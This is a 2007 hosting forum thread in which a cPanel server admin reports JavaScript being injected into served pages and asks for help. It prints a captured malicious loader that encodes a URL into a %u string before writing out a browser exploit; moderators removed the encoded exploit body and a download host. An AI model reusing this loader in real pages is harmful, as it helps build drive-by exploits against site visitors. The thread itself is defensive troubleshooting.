hosted by liquidweb

Go Back   Web Hosting Talk : Web Hosting Main Forums : Hosting Security and Technology : Linux servers having CPANEL - js virus hitting

Forum Jump

Linux servers having CPANEL - js virus hitting

Reply Post New Thread In Hosting Security and Technology Subscription

Send news tip View All Posts Thread Tools Search this Thread Display Modes
Old
WHT Addict

Exclamation

Linux servers having CPANEL - js virus hitting

Hi All,

Earlier this week, our users started reporting that they were getting active-x prompts for Microsoft Data Access Component installation. In addition some of them were getting hit byt the RTSP bug (quicktime) and some were getting the JS/Explot-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple html, php, etc) at times a script tag similar to the one below is inserted right after the <body> tag.

<script language='JavaScript' type='text/javascript' src='shfuy.js'></script>

The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.

I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below).

Solutions tried:
I have checked for the filenames but they do not exist on the server.

1) Have run chkrootkit and rootkit hunter - All clean
2) Have run clamav - All clean

Would appreciate if anybody could provide some inputs on what we might be dealing with and how to resolve the problem.

Javascript code:
var arg="akmukvfd";
var MU = "http://" + window.location.hostname + "/" + arg;
var MH = '';
for (i=0; i < MU.length; i++)
{
var b = MU.charCodeAt (i);
MH = MH + b.toString (16);
}
MH = MH.toUpperCase();
if (Math.round(MU.length/2) != (MU.length/2))
{
MH += '00';
}

var MR = '';
for (i=0; i < MH.length; i += 4)
{
MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
}

var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";

var SB =
<<removed encoded exploit>>

document.write (SB);

Thanks,
Regards
Rushik Shah

Last edited by bear; 11-25-2007 at 09:59 PM. Reason: Pointless to help spread this

Sponsored Links
Old
Web Hosting Master

Anybody have the FTP information of all the accounts having this problem? it may be possible that a compromised computer were infecting those sites without even knew it.

DowntownHost LLC - In Business since 2001- West/Center/East USA - Netherlands - Singapore

Old
& Goliath

It's more than likely it was just a deface of the specific account. Doubtful that it's an end-user's system being exploited and then FTPing up the data, far too much effort

Sponsored Links
Old
WHT Addict

Hi Jedito / David

Thanks for your quick reply. Actually I already did this check

I changed ftp passwords, but still it got effected after 3-4 days again.

The matter of fact is almost all websites on the server are affected. Mostly the index . html, php files

Any clue

Thanks!
Regards
Rushik Shah

Old
Web Hosting Master

Quote:
Originally Posted by David View Post
It's more than likely it was just a deface of the specific account. Doubtful that it's an end-user's system being exploited and then FTPing up the data, far too much effort

There's an trojan which does this automatically, the trojan infect the computer and pickup all the FTP book of any FTP program installed in the computer, it does send it to the "hacker" which lately use it to upload the infected data, this happened to one of my resellers awhile ago.

to the OP, check on the FTP logs of the affected account which files were uploaded and check if the IP uploading those files mismatch in all them.

DowntownHost LLC - In Business since 2001- West/Center/East USA - Netherlands - Singapore

Old
Web Hosting Evangelist

Hi,

Which platforms does this trojan infects? Do you know its name?

Thanks,
sash

Old
Junior Guru Wannabe

Is there a way to stop this from happening on a cpanel server?

Old
Community Guide

Looks like a buffer overflow JS exploit. NoScript stops it, but I would do this:

find / -name *.js | xargs grep unescape

Old
the ground beneath my feet

The code is here: <<snipped>>

Last edited by not-even-a-mouse; 11-25-2007 at 09:04 PM.
Old
Community Guide

Also, check xferlog and see who uploaded it.

Old
Web Hosting Master

To clarify, there is absolutely no evidence provided that this is at all isolated to cPanel even if it is in fact an issue.

425.298.2282 nn@demandmedia.com

Old
Community Guide

Don't paste code like that on a public forum.

Old
the ground beneath my feet

Quote:
Originally Posted by zacharooni View Post
Don't paste code like that on a public forum.
It's already in the OP, just URI encoded.

Old
Community Leader

Quote:
Originally Posted by Procyon View Post
It's already in the OP, just URI encoded.
Not any more. Let's try not to feed the "kiddies".

Old
Web Hosting Guru

Hello Rushik,

I can second your findings. The exploit appears all the time on different pages (the page indicated by KIS keeps changing, usually HTML) and it doesn't appear twice for the same IP and this seems to me to be related to IE only. Have you discovered anything new?

Quote:
Looks like a buffer overflow JS exploit. NoScript stops it, but I would do this:

find / -name *.js | xargs grep unescape
There is usually NO unescape(), no eval(), no iframe anywhere on the affected accounts. The .js file (this also changes) doesn't even exist anywhere on the server. It's like Trojan-Downloader.JS.Small.fs gets generated on the fly (in our case it tries to download a Exploit.HTML.IESlice.n from <<removed>>

Any clue anyone?

Thanks and regards!

Last edited by bear; 11-28-2007 at 07:27 AM.

Related posts from TheWhir.com
Title Type Date Posted
GoDaddy Supports cPanel as Part of Web Hosting Updates Web Hosting News 2014-05-09 12:40:20
CloudLinux Releases New Inode Limits Feature for cPanel Web Hosting News 2013-08-28 16:38:27
TrendyTools Launches HTML 5 Website Builder cPanel Plugin Web Hosting News 2013-08-07 14:18:20
Web Hosting Sales and Promos Roundup – March 22, 2013 Web Hosting News 2014-05-23 15:43:14
SSHD Rootkit in the Wild Blog 2013-02-22 16:44:08